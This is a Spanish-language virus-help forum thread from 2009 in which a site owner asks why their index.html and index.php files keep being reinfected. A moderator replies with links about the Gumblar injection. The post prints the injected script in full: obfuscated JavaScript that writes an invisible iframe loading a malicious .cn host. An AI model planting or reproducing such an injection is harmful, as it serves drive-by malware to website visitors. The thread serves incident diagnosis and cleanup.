|
| |||||||
| Foro de Virus y Spywares Ayuda con: Malwares - Virus - Spywares - Troyanos - Adwares - Worms - Hijackers - Dialers - Rootkits - Keylogger - etc.) Plantéanos tu problema en este sector. No ponga su log de HijackThis aquí !! |
 |
| | Enviar a: | Herramientas |
 | 
08/06/09, 09:33:24
|  |
| |||
 Archivos html y php infectados Buenos dias a todos. Soy nuevo en el foro, aunque ya conozco el foro desde hace mucho y me habeis solucionado algun que otro marron leyendo vuestros consejos, en primer lugar daros la enhorabuena a todos por vuestra labor de "cazabichos" y "cazafantasmas". Mi problema es que tengo varias paginas web alojadas por distintos servidores, y desde hace un mes aproximadamente algunas de estas empezaron a dar fallos en Chrome y Firefox, alertas de seguridad de Google advirtiendo de codigo maliciosa contenido en ellas. En concreto creo que las unicas tres que ha llegado a mostrar hasta entonces son: ===== (..)elementos del sitio hit-senders.cn, que aloja software malintencionado(..) (..)elementos del sitio traffic-resources.cn, que aloja software malintencionado(..) (..)elementos del sitio gurru-turru.cn, que aloja software malintencionado(..) ===== Y el Bitdefender cuando he decidido entrar de todas maneras en las paginas me lanza la alerta de infeccion por: Exploit.SWF.Gen. Despues de analizar un poco los archivos descubrimos que muchas de los archivos index.html y index.php, estaban infectados con este script, o similar a este (los codigos encriptados varian a veces en funcion del archivo): =============================================== <script type="text/javascript">var xkEyyvGRxZUHiUvfAHXn = "kYt60kYt105kYt102kYt114kYt97kYt109kYt101kYt32kYt1 19kYt105kYt100kYt116kYt104kYt61kYt34kYt52kYt56kYt4 8kYt34kYt32kYt104kYt101kYt105kYt103kYt104kYt116kYt 61kYt34kYt54kYt48kYt34kYt32kYt115kYt114kYt99kYt61k Yt34kYt104kYt116kYt116kYt112kYt58kYt47kYt47kYt104k Yt105kYt116kYt45kYt115kYt101kYt110kYt100kYt101kYt1 14kYt115kYt46kYt99kYt110kYt47kYt102kYt105kYt110kYt 100kYt47kYt105kYt110kYt46kYt99kYt103kYt105kYt63kYt 52kYt34kYt32kYt115kYt116kYt121kYt108kYt101kYt61kYt 34kYt98kYt111kYt114kYt100kYt101kYt114kYt58kYt48kYt 112kYt120kYt59kYt32kYt112kYt111kYt115kYt105kYt116k Yt105kYt111kYt110kYt58kYt114kYt101kYt108kYt97kYt11 6kYt105kYt118kYt101kYt59kYt32kYt116kYt111kYt112kYt 58kYt48kYt112kYt120kYt59kYt32kYt108kYt101kYt102kYt 116kYt58kYt45kYt53kYt48kYt48kYt112kYt120kYt59kYt32 kYt111kYt112kYt97kYt99kYt105kYt116kYt121kYt58kYt48 kYt59kYt32kYt102kYt105kYt108kYt116kYt101kYt114kYt5 8kYt112kYt114kYt111kYt103kYt105kYt100kYt58kYt68kYt 88kYt73kYt109kYt97kYt103kYt101kYt84kYt114kYt97kYt1 10kYt115kYt102kYt111kYt114kYt109kYt46kYt77kYt105kY t99kYt114kYt111kYt115kYt111kYt102kYt116kYt46kYt65k Yt108kYt112kYt104kYt97kYt40kYt111kYt112kYt97kYt99k Yt105kYt116kYt121kYt61kYt48kYt41kYt59kYt32kYt45kYt 109kYt111kYt122kYt45kYt111kYt112kYt97kYt99kYt105kY t116kYt121kYt58kYt48kYt34kYt62kYt60kYt47kYt105kYt1 02kYt114kYt97kYt109kYt101kYt62";var jkhHpzrFkCQhnUglPmDM = xkEyyvGRxZUHiUvfAHXn.split("kYt");var MXUusQasXxgHhOOXNFdx = "";for (var ItfvOMhdykqLILFAbftz=1; ItfvOMhdykqLILFAbftz<jkhHpzrFkCQhnUglPmDM.length; ItfvOMhdykqLILFAbftz++){MXUusQasXxgHhOOXNFdx+=Stri ng.fromCharCode(jkhHpzrFkCQhnUglPmDM[ItfvOMhdykqLILFAbftz]);}var uBySxOjiajVeIGOIvdos = ""+MXUusQasXxgHhOOXNFdx+"";document.write(""+uBySx OjiajVeIGOIvdos+"")</script> =============== Incluso, de algunos archivos .html y .php se borro codigo, ademas de meter este dichoso codigo. Menos mal que guardamos copia de todo, y pudimos reestablecerlo. He intentado de todo manualmente: 1º Bajar las webs y pasar el antivirus BitDefender:(No detecta nada) 2º Volver a subir las webs:(Es igual, se vuelven a infectar) 3º Borrar el script de todos los archivos index, ya que los demas comprobamos que no estan infectados(los que no son index):(Al poco tiempo el mismo script vuelve a introducirse dentro). ¿Que puedo hacer?¿Hay alguna manera de reestringir la escritura a dichos archivos?¿Utilizar alguna herramienta especifica?. Muchas de las webs son para clientes externos y por su puesto estan que echan chispas  ¿Nos pueden estar modificando los archivos desde dentro, alguna persona que conozca usuario/contraseña o que la haya podido conseguir espiando?¿Es un script alojado en algun sitio? En fin, son muchas dudas espero que podais ayudarme. Gracias de antemano y un saludo a todos.  |
| InfoSpyware | ||
| |
|
08/06/09, 13:39:58
| |
| ||||
| Re: Archivos html y php infectados Que tal carabias, Bienvenid@
Lo que puedo hacer es dejarte un poco de Info de otras personas con tu mismo problema: Gumblar .cn Exploit - 12 Facts About This Injected Script | Unmask Parasites. Blog. How to protect your website from gumblar.cn infection | Pakzilla | be a technology monster Descarga y actualiza <Malwarebytes' Anti-Malware+ Leer_manual> Salu2.............> Blog | Antivirus Online | Eliminar Malwares | Antivirus Gratis * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook. * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro. |
|
« Tema Anterior
|
Próximo Tema »
| Herramientas | |
| |
| 
Temas Similares | |
| Tema | Autor | Foro | Respuestas | Último mensaje |
| Virus "Spam Tool.CGX" | matinatella | Foro de Virus y Spywares | 14 | 02/04/09 19:58:36 |
| virus atraves de usb, pc totalmente infectado | reblogucionario | Foro Oficial de HijackThis en español | 2 | 15/03/09 21:35:52 |
| trojan.packed.NsAnti | velvet-blue | Foro de Virus y Spywares | 21 | 03/07/08 09:38:35 |
| Como limpio mi PC de virus | manolo.mx | Temas Solucionados | 4 | 06/05/08 11:17:06 |
| Hola necesito ayuda con virus (solucionado) | matt_077 | Temas Solucionados | 15 | 16/01/08 13:39:21 |
Todas las horas son GMT -4. La hora es 21:44:12.
